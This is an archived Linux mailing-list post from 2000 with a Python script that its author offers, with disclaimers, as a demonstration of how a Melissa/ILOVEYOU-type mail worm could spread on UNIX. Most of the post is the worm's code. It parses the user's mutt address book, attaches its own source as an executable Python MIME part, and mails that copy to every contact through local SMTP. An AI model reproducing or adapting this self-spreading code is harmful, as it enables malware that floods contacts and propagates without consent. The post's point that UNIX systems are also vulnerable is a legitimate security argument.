On Fri, May 12, 2000 at 10:09:08PM +0530, Govind Chandra wrote:
> Are you suggesting that there is a version of this ILOVEYOU worm
> which is capable of deleting files on a Linux machine? Some more
> details will be greatly appreciated.
Alright guys, that was a joke. But here is a real one. Before anyone
comes after me for writing a "virus", here is the disclaimer
# Purpose: to demonstrate how a Melissa/ILOVEYOU type virus can be written
# for UNIX. This script is for educational purposes only. Please don't
# forward it. You and you alone will be responsible for any harm
# caused, if you forward this, without appropriate warnings.
Basically, if you have the right entries in your mailcap/mime.types files
to execute python, or you've created application/x-python in your KDE
environment (Note: this setup is unlikely to be the default on most of
your machines), then opening this file in mutt/kmail or any other mail
client will automatically send out copies of itself to everyone in your
mutt address book (mine is $HOME/.mail_aliases).
Again, kids, don't try this alone at home. The only purpose of this is
to dispel the myth that 'UNIX is secure, Windows is not'. Security is a
process, it's not a product.
A perl version (because it's more common than python), with support for
parsing various address books would be deadlier, but is uninteresting to
the author.
-Arun
# Author: Arun Sharma <[EMAIL PROTECTED]>
# Date: Sat May 13 16:05:55 PDT 2000
#
# Purpose: to demonstrate how a Melissa/ILOVEYOU type virus can be written
# for UNIX. This script is for educational purposes only. Please don't
# forward it. You and you alone will be responsible for any harm
# caused, if you forward this, without appropriate warnings.
import sys, fileinput, os, MimeWriter, tempfile, time
from string import *
from smtplib import *
def gettime():
return time.asctime(time.localtime(time.time())) + ' ' + time.tzname[0]
# Open the mutt address book
abook = os.environ['HOME'] + os.sep + '.mail_aliases'
me = sys.argv[0]
emails = []
email_regex = re.compile("(.*)@(.*)")
username_regex = re.compile(".*?([^\s(<]+)$")
domain_regex = re.compile("([^>)\s]*).*")
# Parse the address book - this is specific to mutt
try:
file = fileinput.FileInput(abook)
for line in file:
if line == None:
break
email = split(line)[2:]
email = join(email)
m = email_regex.match(email)
pre = m.group(1)
post = m.group(2)
m = username_regex.match(pre)
username = m.group(1)
m = domain_regex.match(post)
domainname = m.group(1)
email = username + '@' + domainname
emails.append(email)
except IOError:
sys.exit(0)
mainf = tempfile.TemporaryFile()
w = MimeWriter.MimeWriter(mainf)
w.addheader('From', '[EMAIL PROTECTED]')
w.addheader('To', '[EMAIL PROTECTED]')
w.addheader('Subject', 'Dont forward this')
w.addheader('Date', gettime())
w.startmultipartbody('mixed')
subwriter = w.nextpart()
f = subwriter.startbody('text/plain')
f.write("""
hello, there is a demo virus program attached. Execute it only in a
secure environment.
""")
subwriter = w.nextpart()
f = subwriter.startbody('application/x-python')
myfile = open(me)
while 1:
line = myfile.readline()
if line == "":
break
f.write(line)
w.lastpart()
# Now lets read in the full message
mainf.seek(0)
msg = ""
while 1:
line = mainf.readline()
if line == "":
break
msg = msg + line
mainf.close()
# Now send out the emails
server = SMTP('localhost')
server.sendmail('[EMAIL PROTECTED]', emails, msg)
server.quit()
-----------------------------------------------------------------------
The LIH mailing list archives are available at:
http://lists.linux-india.org/cgi-bin/wilma/linux-india-help
